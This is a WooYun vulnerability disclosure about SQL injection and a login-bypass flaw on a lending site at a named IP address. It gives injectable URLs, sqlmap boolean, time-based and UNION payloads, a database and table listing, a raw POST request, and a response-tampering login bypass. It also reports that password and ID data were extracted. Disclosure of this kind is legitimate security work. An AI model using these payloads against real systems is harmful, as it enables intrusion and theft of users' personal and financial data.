乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开
漏洞这么多也不怕数据被盗
http://180.97.80.205/
#1注入点1,id参数
http://180.97.80.205/appaction/bao_detail.php?id=51&time=0.9278282364830375
sqlmap跑的时候去掉提么参数,否则会报错
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=51 AND 5254=5254 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE) Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=51 AND 5254=5254 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE) Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=51 AND 5254=5254 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE) Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12available databases [6]:[*] information_schema[*] mysql[*] performance_schema[*] sq_phpcms[*] sq_shangyu[*] sq_yindian
主要数据在最后三个库里面
Database: sq_yindian+-----------------------+---------+| Table | Entries |+-----------------------+---------+| dw_account_log | 29623 || dw_user_sendemail_log | 21667 || dw_message | 15222 || dw_account_recharge | 9664 || dw_borrow_collection | 7980 || dw_friends | 7723 || dw_user_log | 7599 || dw_credit_log | 6407 || sendlog | 4240 || dw_user_amount | 4143 || dw_user_cache | 4132 || dw_user | 4120 || dw_borrow_tender_log | 3896 || dw_area | 3579 || dw_borrow_tender | 3460 || dw_prize_order | 2584 || dw_account_cash | 1514 || dw_credit | 1424 || dw_account | 947 || dw_userinfo | 813 || dw_article | 778 || dw_account_bank | 752 || dw_article_fields | 717 || dw_linkage | 521 || dw_user_amountlog | 485 || dw_borrow_repayment | 420 || dw_cache | 414 || dw_cityinfo | 380 || dw_userlog_recharge | 376 || dw_upfiles | 368 || dw_everyday | 285 || dw_user_backup | 253 || dw_borrow | 228 || dw_daizi | 162 || dw_user_trend | 136 || dw_user_amountapply | 106 || dw_system | 88 || dw_site | 86 || dw_linkage_type | 42 || dw_attestation_type | 40 || dw_remind | 28 || dw_bbs_posts | 26 || dw_attestation | 24 || dw_module | 23 || dw_gongan_jk | 18 || dw_links | 16 || dw_user_type | 16 || dw_bbs_topics | 14 || dw_credit_type | 14 || dw_scrollpic | 12 || dw_bbs_forums | 10 || dw_borrow_auto | 9 || dw_bbs_credits | 8 || dw_credit_rank | 6 || dw_invite_type | 5 || dw_online | 5 || dw_prize | 5 || dw_liuyan_set | 4 || dw_report_users | 4 || dw_flag | 3 || dw_friends_request | 3 || dw_remind_type | 3 || dw_report_roles | 3 || dw_scrollpic_type | 3 || dw_links_type | 2 || dw_log | 2 || dw_payment | 2 || dw_ad | 1 || dw_bbs_settings | 1 || dw_borrow_editlog | 1 || dw_editor | 1 || dw_fields | 1 |+-----------------------+---------+
只做演示,跑出了三条数据,有登录密码,支付密码,身份证号,邮箱等信息
涉及支付密码
#2另一处SQL注入是手机端摇一摇界面,基于时间的注入
http://180.97.80.205/appaction/yaoyiyao.php?uid=1
#第三处SQL注入
POST http://180.97.80.205/appaction/phone_action.php HTTP/1.1Host: 180.97.80.205Connection: keep-aliveContent-Length: 15Accept: */*Origin: file://X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip,deflateAccept-Language: zh-CN,en-US;q=0.8data=null%5D%5B*
#3逻辑漏洞手机端登陆界面,简单的不能再简陋了,验证码没有,明文传输,这个如果爆破的话相信只是时间的问题登陆的时候抓返包,修改返回包为1
数百个推荐记录
从服务器端验证登录状态网站多个参数存在注入,建议找专人好好排查一下
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)